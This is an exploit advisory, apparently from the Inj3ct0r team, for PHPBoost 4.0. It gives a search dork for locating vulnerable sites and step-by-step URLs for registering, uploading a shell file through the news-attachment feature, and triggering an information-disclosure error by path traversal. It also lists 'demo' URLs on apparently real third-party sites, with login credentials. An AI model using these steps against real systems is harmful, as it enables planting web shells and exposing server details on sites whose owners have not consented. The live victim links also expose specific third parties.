PHPBoost 4.0 Shell Upload

2013.03.12
Credit: KedAns-Dz
Risk: High
Local: No
Remote: Yes
CVE: N/A
CWE: CWE-264

1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=0 0 _ __ __ __ 1 1 /' \ __ /'__`\ /\ \__ /'__`\ 0 0 /\_, \ ___ /\_\/\_\ \ \ ___\ \ ,_\/\ \/\ \ _ ___ 1 1 \/_/\ \ /' _ `\ \/\ \/_/_\_<_ /'___\ \ \/\ \ \ \ \/\`'__\ 0 0 \ \ \/\ \/\ \ \ \ \/\ \ \ \/\ \__/\ \ \_\ \ \_\ \ \ \/ 1 1 \ \_\ \_\ \_\_\ \ \ \____/\ \____\\ \__\\ \____/\ \_\ 0 0 \/_/\/_/\/_/\ \_\ \/___/ \/____/ \/__/ \/___/ \/_/ 1 1 \ \____/ >> Exploit database separated by exploit 0 0 \/___/ type (local, remote, DoS, etc.) 1 1 1 0 [+] Site : 1337day.com 0 1 [+] Support e-mail : submit[at]1337day.com 1 0 0 1 ######################################### 1 0 I'm KedAns-Dz member from Inj3ct0r Team 1 1 ######################################### 0 0-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-1 ### # Title : PHPBoost 4.0 <= (FileUpload/Disclosure) Multiple Vulnerabilities # Author : KedAns-Dz # E-mail : ked-h (@hotmail.com / @1337day.com) # Home : Hassi.Messaoud (30500) - Algeria -(00213555248701) # Web Site : www.1337day.com # FaCeb0ok : http://fb.me/Inj3ct0rK3d # TwiTter : @kedans # Friendly Sites : www.r00tw0rm.com * www.exploit-id.com # Platform/CatID : php - remote - Multiple # Type : php - proof of concept - webapp 0day # Tested on : Windows7 # Download : [http://www.phpboost.com/download/download.php] # Vendor : [www.phpboost.com] ### # <3 <3 Greetings t0 Palestine <3 <3 # F-ck HaCking, Lov3 Explo8ting ! ######## [ Proof / Exploit ] ################|=> # Google Dork : --------------- = allintext:"Boost par PHPBoost 4.0" # Start ... Create new User -------- = http://127.0.0.1/phpboost/user/?url=/registration/ # Remote File Upload : ---------------------- + Go to see News page => = http://127.0.0.1/phpboost/news/news.php + Post new news => = http://127.0.0.1/phpboost/news/management.php?new=1&cat=0 + Push Upload attatch , and upload you'r file/Shell ( ex k.txt ) ! proof img : (http://oi45.tinypic.com/ay2cs7.jpg) ! Find you'r file ex: = http://127.0.0.1/phpboost/upload/k.txt Demo : *************************************** http://asylumspecimens.olympe.in user : ked pass : 123456 http://asylumspecimens.olympe.in/upload/k.txt *********************************************** # Full Informations Disclosure : --------------------------------- = http://127.0.0.1/phpboost/user/?url=/../../KedAns ! You Get Error page , in page content you see some php.ini content like server information , and the full path ...etc proof img : (http://oi49.tinypic.com/2l00g.jpg) Demo's : ************************************************ http://shura-fansub.rd-h.com/user/?url=/../../KedAns http://asylumspecimens.olympe.in/user/?url=/../../KedAns ********************************************************** # Sp. GreetS t0 : Elite_Trojan & Evil-Dz & all Dz_Mafia Cr3w <3 #================[ Exploited By KedAns-Dz * Inj3ct0r Team * ]======== # Inj3ct0r Members 31337 : KedAns ^^ * KnocKout * SeeMe * Kalashinkov3 * ZoRLu * anT!-Tr0J4n * Angel Injection # NuxbieCyber (www.1337day.com/team) * Dz Offenders Cr3w * Algerian Cyber Army * xDZx * HD Moore * YMCMB ..all # Exploit-ID Team : jos_ali_joe + kaMtiEz + r3m1ck (exploit-id.com) * Milw0rm * KeyStr0ke * JF * L3b-r1Z * HMD # packetstormsecurity.org * metasploit.com * r00tw0rm.com * OWASP Dz * B.N.T * All Security and Exploits Webs #=====================================================

References:

http://fb.me/Inj3ct0rK3d


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2024, cxsecurity.com

 

Back to Top